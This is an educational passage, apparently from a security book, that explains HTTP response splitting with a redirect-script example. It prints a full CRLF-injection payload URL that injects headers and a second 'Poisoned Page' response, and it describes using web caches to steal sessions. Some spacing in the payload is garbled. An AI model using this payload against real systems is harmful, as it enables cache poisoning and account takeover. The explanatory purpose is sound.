HTTP Response Splitting

Popularity:

6

Simplicity:

4

Impact:

8

Risk Rating:

6

HTTP response splitting vulnerabilities arise due to the web application not validating user-supplied input, namely carriage returns (CRs) and line feeds (LFs). When this usersupplied data is placed into the HTTP headers of the web server response by the web application, an attacker is able to split up the response by injecting CRs and LFs and then continuing on with a completely new response, performing a variety of attacks.

Let's say the web application utilizes the following custom script to redirect users when they request certain pages:

http://10.1.1.9/redirect.php?file=welcome.php

When a user requests this page, the server replies with the following response:

HTTP/1.0 302 Found

Content-Type: text/html

Location: http://10.1.1.9/welcome.php

Server: Apache

Content-Length: 24

<html>Redirecting</html>

The value of the file parameter, welcome.php, has therefore been injected into the HTTP Location header of the web server response. By adding a CRLF (%0d%0a) onto the end of this request, we are able to inject new lines and create our own headers in the response, as well as split it into multiple responses with additional new lines. The following request (all on a single line) could be used to carry out HTTP response splitting against this web application:

http://10.1.1.9/redirect.php?file=welcome.php%0d%0aContent-Length:%20 0%0d%0a%0d%0aHTTP/1.0%2020 0%20OK%0d%0aContent-Type:%2 0text/ html%0d%0aLast-Modified:%20Fri,%2031%20Dec%202020%2023:59:59%20GMT%0d%0 aContent-Length:%2 02 8%0d%0a%0d%0a<html>Poisoned%20Page</html>

This request would result in the server sending back the following response:

HTTP/1.0 302 Found Content-Type: text/html

Location: http://10.1.1.9/welcome.php Content-Length: 0

HTTP/1.0 200 OK Content-Type: text/html

Last-Modified: Fri, 31 Dec 2020 23:59:59 GMT Content-Length: 28

<html>Poisoned Page</html> Server: Apache Content-Length: 24 <html>Redirecting</html>

The response has, therefore, been split into two responses based on our input to the file parameter passed to the redirect.php script. The first response is the 302 redirect with a content-length of 0, and the second response is the 200 OK response with a content-length of 2 8 consisting of the data <html>Poisoned Page</html>. The data at the end of the second response would be discarded since it does not adhere to the HTTP standard.

So if the attacker now makes two requests, the first being the attack request just used, and the second being a normal request to the login.php script, then the first response (302) will be matched up with our first attack request for welcome.php:

HTTP/1.0 302 Found Content-Type: text/html Location: http://10.1.1.9/welcome.php Content-Length: 0

And the second response will be matched up with the request for login.php:

HTTP/1.0 200 OK Content-Type: text/html

Last-Modified: Fri, 31 Dec 2020 23:59:59 GMT Content-Length: 28

<html>Poisoned Page</html>

Setting the Last-Modified header within the poisoned page to a date in the future should cause most web caches to cache the content of the poisoned page. Therefore, if web caches are used as a part of the organization's web infrastructure, any user requesting the login.php page would then be passed the poisoned page.

The content of the poisoned page could have easily contained some malicious JavaScript code that captured session identifiers, cookies, and authentication credentials, leading to accounts within the web application being compromised.

This vulnerability can also enable similar attacks to be carried out, such as web browser cache poisoning, cross-site scripting, and response hijacking. Response hijacking allows an attacker to receive a server response that was destined for another user using similar techniques to confuse the request/response sequence. This may allow sensitive information within that response to be leaked, including session identifiers and cookies, again, possibly leading to accounts being compromised.

Was this article helpful?

0 0
The Ultimate Computer Repair Guide

The Ultimate Computer Repair Guide

Read how to maintain and repair any desktop and laptop computer. This Ebook has articles with photos and videos that show detailed step by step pc repair and maintenance procedures. There are many links to online videos that explain how you can build, maintain, speed up, clean, and repair your computer yourself. Put the money that you were going to pay the PC Tech in your own pocket.

Get My Free Ebook


Post a comment